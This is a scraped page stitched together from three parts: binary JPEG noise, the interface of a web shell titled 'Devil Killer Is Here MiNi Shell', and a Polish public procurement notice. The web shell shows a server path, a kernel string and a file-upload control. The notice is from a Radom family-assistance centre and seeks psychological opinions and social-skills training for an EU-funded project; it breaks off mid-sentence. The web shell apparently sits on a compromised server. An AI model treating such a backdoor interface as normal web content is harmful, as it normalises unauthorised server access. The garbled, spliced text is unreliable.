JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220610/0020491601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> &#34;Opracowanie opinii psychologicznych i przeprowadzenie zajęć w ramach realizacji wsparcia dla Uczestników projektu „Szansa dla Ciebie” (...)&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowe Centrum Pomocy Rodzinie w Radomiu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 670231597</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tadeusza Mazowieckiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">48 38 15 070</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">48 38 15 070</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pcpr@spradom.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pcprradom.finn.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> jednostka organizacyjna samorządu terytorialnego </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Opracowanie opinii psychologicznych i przeprowadzenie zajęć w ramach realizacji wsparcia dla Uczestników projektu „Szansa dla Ciebie” (...)&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c80d4e81-e89c-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00204916</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00039808/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Przeprowadzenie form wsparcia dla Uczestników Projektu &#34;Szansa dla Ciebie&#34; współfinansowanego ze środków EFS w ramach RPO WM 2014-2020</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Szansa dla Ciebie” współfinansowany z Europejskiego Funduszu Społecznego w ramach Osi Priorytetowej IX Wspieranie włączenia społecznego i walka z ubóstwem, Działanie 9.1 Aktywizacja społeczno-zawodowa osób wykluczonych i przeciwdziałanie wykluczeniu społecznemu Regionalnego Programu Operacyjnego Województwa Mazowieckiego na lata 2014-2020 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pcpr-radom.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pcpr-radom.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między Zamawiającym a Wykonawcami, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń odbywa się za pośrednictwem Platformy zakupowej znajdującej się pod adresem: https://pcpr-radom.ezamawiajacy.pl/servlet/HomeServlet .<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi założyć darmowe konto na Platformie zakupowej. Złożenie oferty w postępowaniu wymaga zalogowania Wykonawcy do Systemu na subdomenie <br/>https://pcpr-radom.ezamawiajacy.pl/servlet/HomeServlet lub https://oneplace.marketplanet.pl .<br/>Informacja dla Wykonawców korzystających z platformy znajduje się pod adresem: https://www.pcprradom.finn.pl/bipkod/27242945.<br/>Regulamin korzystania z platformy zakupowej Zamawiającego Market planet znajduje się pod adresem: https://oneplace.marketplanet.pl/regulamin .</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1)	administratorem danych osobowych jest Powiatowe Centrum Pomocy Rodzinie w Radomiu, ul. Tadeusza Mazowieckiego 7; reprezentowane przez Dyrektora z siedzibą w Radomiu przy ul. T. Mazowieckiego 7, tel. (48) 38 15 070, adres e-mail: pcpr@spradom.eu.<br/>2)	z inspektorem ochrony danych osobowy w Powiatowym Centrum Pomocy Rodzinie w Radomiu, ul. Tadeusza Mazowieckiego 7, 26-600 Radom, kontaktować można się pod adresem e-mail: kontakt.iod@gmail.com. <br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pod nazwą: &#34;Opracowanie opinii psychologicznych i przeprowadzenie zajęć w ramach realizacji wsparcia dla Uczestników projektu „Szansa dla Ciebie” współfinansowanego z Europejskiego Funduszu Społecznego w ramach realizowanego w ramach Osi Priorytetowej IX Wspieranie włączenia społecznego i walka z ubóstwem, Działania 9.1 Aktywizacja społeczno-zawodowa osób wykluczonych i przeciwdziałanie wykluczeniu społecznemu Regionalnego Programu Operacyjnego Województwa Mazowieckiego na lata 2014-2020”, prowadzonym w trybie podstawowym na podstawie art. 275 ust 1 pzp;<br/>3)	Pani/Pana dane osobowe przetwarzane będą w celu przeprowadzenia postępowania o udzieleniu zamówienia publicznego, zgodnie z wymaganiami określonymi w ustawie z dnia 11 września 2019 r. Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129 z późn. zm.), a następnie zawarcia umowy z wybranym wykonawcą, jej realizacji oraz rozliczenia;<br/>4)	podstawą przetwarzania Pani/Pana danych osobowy jest art. 6 ust. 1 lit b) i c) ogólnego rozporządzenia o ochronie danych z dnia 27 kwietnia 2016 r., tj. przetwarzanie jest niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy oraz przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze, wynikającego z ustawy z 11.09.2019 r. Prawo zamówień publicznych;<br/>5)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o przepisy ustawy Prawo zamówień publicznych;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Prawo zamówień publicznych, związanym z udziałem w postępowaniu o udzieleniu zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z w/w ustawy;<br/>7)	posiada Pani/Pan prawo do:<br/>•	żądania dostępu do treści swoich danych osobowych, ich sprostowania lub ograniczenia przetwarzania;<br/>•	wniesienia skargi do organu nadzorczego – Prezesa Urzędu Ochrony Danych Osobowych;<br/>8)	nie przysługuje Pani/Panu:<br/>•	w związku z art. 17 ust. 3 lit b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. C RODO;<br/>9)	Pani/Pana dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu; <br/>10)	Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat liczonych od dnia zakończenia postępowania o udzieleniu zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CPR.RPMA.271.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 313898,40 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 27400,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa opracowania przez psychologa opinii na potrzeby indywidualnej diagnozy potrzeb oraz oceny postępów w zakresie aktywizacji społeczno - zatrudnieniowej dla 32 Uczestników projektu pn. „Szansa dla Ciebie” współfinansowanego z Europejskiego Funduszu Społecznego w ramach Osi Priorytetowej IX Wspieranie włączenia społecznego i walka z ubóstwem Działania 9.1 Aktywizacja społeczno – zawodowa osób wykluczonych i przeciwdziałanie wykluczeniu społecznemu Regionalnego Programu Operacyjnego Województwa Mazowieckiego na lata 2014-2020, w celu ustalenia dla nich ścieżki reintegracji i oceny efektywności otrzymanego wsparcia – ogółem co najmniej 128 godzin zegarowych, w tym: <br/>a.	dla 8 Uczestników projektu pn. „Szansa dla Ciebie” – mieszkańców Domu Pomocy Społecznej w Jedlance - ogółem co najmniej 32 godziny zegarowe;<br/>b.	dla 8 Uczestniczek projektu pn. „Szansa dla Ciebie” – mieszkanek Domu Pomocy Społecznej w Krzyżanowicach - ogółem co najmniej 32 godziny zegarowe;<br/>c.	dla 8 Uczestników projektu pn. „Szansa dla Ciebie” – mieszkańców Domu Pomocy Społecznej w Wierzbicy - ogółem co najmniej 32 godziny zegarowe;<br/>d.	dla 8 Uczestników projektu pn. „Szansa dla Ciebie” – mieszkańców powiatu radomskiego (osób ze środowiska) - ogółem co najmniej 32 godziny zegarowe.<br/>ETAP I - Usługa w zakresie opracowania przez psychologa opinii na potrzeby indywidualnej diagnozy potrzeb będzie obejmowała:<br/>a.	przeprowadzenie z każdym Uczestnikiem Projektu wywiadu będącego podstawą do opracowania opinii na potrzeby indywidualnej diagnozy potrzeb, ze szczególnym uwzględnieniem jego funkcjonowania w sferze społecznej, trudności i ograniczeń oraz słabych i mocnych stron, wskazania kompetencji i umiejętności społecznych wymagających podniesienia, <br/>b.	zaproponowanie adekwatnych do wyników diagnozy form wsparcia (usług aktywnej integracji) jakimi należałoby objąć każdego Uczestnika w ramach projektu,<br/>c.	pisemne opracowanie odrębnie dla każdego Uczestnika Projektu opinii (wyników wywiadu) na formularzu ustalonym z Zamawiającym.<br/>ETAP II - Usługa w zakresie opracowania przez psychologa opinii na potrzeby oceny postępów w zakresie aktywizacji społeczno – zatrudnieniowej będzie obejmowała:<br/>•	przeprowadzenie z każdym Uczestnikiem Projektu wywiadu będącego podstawą do opracowania opinii nt. oceny postępów Uczestnika Projektu w procesie aktywizacji społeczno-zatrudnieniowej, w tym zmniejszenia dystansu do zatrudnienia na zakończenie udziału w projekcie przez danego Uczestnika,<br/>•	pisemne opracowanie odrębnie dla każdego Uczestnika Projektu opinii (wyników wywiadu) na formularzu ustalonym z Zamawiającym. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 8500 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121270-6 - Usługi psychiatryczne lub psychologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokonuje wyboru najkorzystniejszej oferty dla każdej części zamówienia na podstawie kryteriów oceny ofert określonych w SWZ.<br/><br/>Ocena oferty będzie dokonywana wg poniższych zasad:<br/>1)	Ocena w zakresie kryterium „cena” – dla wszystkich Części zamówienia będzie dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego wzoru (liczba punktów możliwych do uzyskania – 60):<br/>PC = ×60 pkt<br/>gdzie: PC – ilość punktów za kryterium „cena”,<br/>Cmin – najniższa cena wynikająca ze złożonych ofert,<br/>Cb – cena badanej oferty.<br/>2)	Ocena w zakresie kryterium „doświadczenie zawodowe psychologa w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym”, będzie dokonywana na podstawie podanej w formularzu ofertowym informacji nt. doświadczenia psychologa wyznaczonego do realizacji zamówienia w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym (min. 2 lata pracy) - liczba punktów możliwych do uzyskania – 40.<br/>Ocena przeprowadzona zostanie wg poniższego zestawienia:<br/>- oferta, w której wskazana przez Wykonawcę liczba lat doświadczenia psychologa wyznaczonego do realizacji zamówienia w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym wynosi:<br/>2 lata - otrzyma 0 pkt<br/>3 lata	- otrzyma 20 pkt<br/>4 lata - otrzyma 30 pkt<br/>5 lat i więcej - otrzyma 40 pkt<br/>gdzie: PD – ilość punktów za kryterium „doświadczenie psychologa w „doświadczenie psychologa w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym” osoby wyznaczonej do realizacji zamówienia<br/>5)	Ocena oferty – dla wszystkich Części zamówienia - suma punktów za poszczególne kryteria:<br/>P= PC+ PD<br/>gdzie: P- ilość punktów<br/>6)	Obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>7)	Zamawiający oceni i porówna tylko te oferty, które odpowiadają treści i wymogom SWZ.<br/>8)	Za najkorzystniejszą dla poszczególnych części zamówienia zostanie uznana oferta, która po zsumowaniu punktów przyznanych w ramach poszczególnych kryteriów, uzyska najwyższą liczbę punktów spośród ofert.<br/>9)	Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybiera ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/>10)	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>11)	Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w pkt 12, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>12)	Wykonawcy składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe psychologa w pracy z osobami wykluczonymi społecznie i/lub zagrożonymi wykluczeniem społecznym</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest usługa przeprowadzenia przez psychologa grupowego treningu kompetencji i umiejętności społecznych w wymiarze 9 godzin lekcyjnych i konsultacji indywidualnych w wymiarze 3 godzin zegarowych dla 12 wychowanków rodzinnej pieczy zastępczej w wieku 15 lat i powyżej - Uczestników projektu pn. „Szansa dla Ciebie” współfinansowanego z Europejskiego Funduszu Społecznego w ramach Osi Priorytetowej IX Wspieranie włączenia społecznego i walka z ubóstwem Działania 9.1 Aktywizacja społeczno – zawodowa osób wykluczonych i przeciwdziałanie wykluczeniu społecznemu Regionalnego Programu Operacyjnego Województwa Mazowieckiego na lata 2014-2020.<br/>2.	Usługa będzie obejmowała:<br/>a.	przeprowadzenie treningu kompetencji i umiejętności społecznych dla grupy 12 wychowanków rodzinnej pieczy zastępczej w wieku 15 lat i powyżej mającego na celu podniesienie kompetencji społecznych umożliwiających prawidłowe funkcjonowanie w życiu społecznym w oparciu o opracowany przez Wykonawcę materiał szkoleniowy obejmujący m.in. następujące zagadnienia: budowanie własnego wizerunku, pozytywnej samooceny, asertywność, poznanie własnych emocji i reakcji, radzenie sobie ze stresem i agresją, rozwiązywanie konfliktów, skuteczna komunikacja.<br/>Wykonawca może poszerzyć minimalny zakres tematyczny podany przez Zamawiającego o zagadnienia związane z zakresem treningu, które w ocenie Wykonawcy powinny być zrealizowane celem odpowiedniego przygotowania uczestników treningu;<br/>b.	przeprowadzenie przez psychologa konsultacji indywidualnych dla uczestników treningu, którzy wyrażą chęć indywidualnej rozmowy/konsultacji z zakresu tematycznego poruszanego podczas zajęć grupowych;<br/>c.	przygotowanie materiałów szkoleniowych dla Uczestników projektu, które są potrzebne do właściwego zrealizowania usługi;<br/>d.	prowadzenie niezbędnej dokumentacji dotyczącej realizowanej usługi, w szczególności: dziennika zajęć, w którym dokumentowane będą zajęcia grupowe w ramach treningu i kart konsultacji indywidualnych z Uczestnikami Projektu, w których dokumentowane będą przeprowadzone konsultacje indywidualne, list obecności Uczestników;<br/>e.	sporządzenie sprawozdania z realizacji zajęć zawierającego co najmniej: okres realizacji zajęć, zakres tematyczny, krótką ocenę aktywności i zaangażowania uczestników podczas zajęć, spostrzeżenia osoby prowadzącej nt. zmian w postawach uczestników na koniec realizacji treningu kompetencji i umiejętności społecznych. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 1200 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80570000-0 - Usługi szkolenia w dziedzinie rozwoju osobistego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokonuje wyboru najkorzystniejszej oferty dla każdej części zamówienia na podstawie kryteriów oceny ofert określonych w SWZ.<br/><br/>Ocena oferty będzie dokonywana wg poniższych zasad:<br/>1)	Ocena w zakresie kryterium „cena” – dla wszystkich Części zamówienia będzie dokonywana na podstawie ilości punktów otrzymanych przy 